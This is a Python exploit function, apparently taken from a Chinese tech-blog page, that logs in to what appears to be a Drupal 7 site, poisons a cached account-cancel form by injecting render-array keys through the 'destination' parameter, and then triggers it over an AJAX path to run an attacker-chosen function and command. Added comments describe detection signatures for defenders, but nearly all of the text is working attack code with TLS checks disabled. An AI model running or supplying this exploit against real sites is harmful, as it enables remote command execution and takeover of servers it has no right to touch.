- def pwn_target(target, username, password, function, command, proxy):
    """Log in to `target`, poison a cached form via `destination`, then trigger it.

    Left exactly as found (whitespace-mangled paste with a leading "- " on every
    line); the comments below are written for defenders who need to recognise
    this traffic and understand what each request does.

    Args:
        target:   base URL of the site; every request goes to this URL with a
                  `q=` query parameter selecting the path.
        username: account name POSTed to `q=user/login`.
        password: password POSTed alongside it.
        function: name placed into `q[#post_render][]` on the poisoned form.
        command:  value placed into `q[#markup]`; the script's own message
                  calls this the payload it "executes".
        proxy:    proxy URL used for both http and https requests.

    Returns:
        None. Progress and the parsed response body are printed.

    Raises:
        Whatever the failing call raised: the bare `except` at the bottom only
        prints a generic message and re-raises.
    """
    # Silences urllib3's InsecureRequestWarning; combined with verify=False on
    # every request below, TLS certificate validation is fully disabled, so the
    # session can be intercepted or redirected by anyone on path.
- requests.packages.urllib3.disable_warnings()
- session = requests.Session()
    # Same proxy for both schemes (e.g. an intercepting proxy for traffic review).
- proxyConf = {
- 'http': proxy, 'https': proxy
- }
- try:
- print('[] Creating a session using the provided credential...')
- get_params = {
- 'q':'user/login'
- }
    # `form_id=user_login` + `op=Log in` looks like a Drupal 7 login form
    # (inferred from the field names; not confirmed by the page).
- post_params = {
- 'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'
- }
- print('[] Finding User ID...')
    # Request 1: credentialed login. In server logs this is a POST to
    # ?q=user/login followed immediately by a GET to ?q=user from the same session.
- session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
- get_params = {
- 'q':'user'
- }
- r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
    # Reads the `about` attribute of <meta property="foaf:name">; if the tag is
    # missing, `.find()` returns None and `.get` raises AttributeError, which
    # the bare except below prints and re-raises.
- user_id = soup.find('meta', {
- 'property': 'foaf:name'
- }).get('about')
    # Non-clean-URL sites return "?q=user/N"; keep only the part after "=".
    # NOTE(review): `split("=")[1]` keeps everything up to the next "=" only —
    # fine for "?q=user/N", but untested for any other shape of `about`.
- if ("?q=" in user_id):
- user_id = user_id.split("=")[1]
- if(user_id):
- print('[] User ID found:' + user_id)
- print('[] Poisoning a form using \'destination\'and including it in cache.')
- get_params = {
- 'q': user_id + '/cancel'
- }
    # Request 2: GET the account-cancel confirmation form to harvest its
    # `form_token` (a per-session CSRF token the next POST must carry).
- r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
- form = soup.find('form', {
- 'id': 'user-cancel-confirm-form'
- })
- form_token = form.find('input', {
- 'name': 'form_token'
- }).get('value')
    # Request 3 (the actual poisoning): the `destination` parameter carries a
    # nested query string whose keys are render-array properties
    # (`q[#post_render][]`, `q[#type]`, `q[#markup]`). requests percent-encodes
    # the "#" as "%23", so a log/WAF signature should match
    # "%23post_render" / "%23markup" (and the raw "#" forms) inside `destination`.
    # Ordinary clients never send "#"-prefixed keys in query parameters.
- get_params = {
- 'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[#post_render][]=' + function + '&q[#type]=markup&q[#markup]=' + command
- }
- post_params = {
- 'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'
- }
- r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
- soup = BeautifulSoup(r.text, "html.parser")
- form = soup.find('form', {
- 'id': 'user-cancel-confirm-form'
- })
    # The `form_build_id` in the response is the handle the script uses for the
    # tampered form (the script's own wording: "Poisoned form ID"). What the
    # server stored against it is not visible here — presumably a cached form
    # including the injected render properties.
- form_build_id = form.find('input', {
- 'name': 'form_build_id'
- }).get('value')
- if form_build_id:
- print('[] Poisoned form ID:' + form_build_id)
- print('[] Triggering exploit to execute:' + command)
    # Request 4: POST to "file/ajax/actions/cancel/#options/path/<form_build_id>"
    # with only the form_build_id. A `file/ajax/` path containing an "#options"
    # segment is another strong detection indicator; note the "#" here is again
    # sent percent-encoded by requests.
- get_params = {
- 'q':'file/ajax/actions/cancel/#options/path/' + form_build_id
- }
- post_params = {
- 'form_build_id':form_build_id
- }
- r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    # Everything before the AJAX "settings" command JSON is treated as output.
- parsed_result = r.text.split('[{"command":"settings"')[0]
- print(parsed_result)
    # Bare except catches BaseException too (including KeyboardInterrupt); it
    # only adds a generic message before re-raising, so the original traceback
    # is preserved but the message itself says nothing about which step failed.
- except:
- print("ERROR: Something went wrong.")
- raise
来源: http://www.bubuko.com/infodetail-3128650.html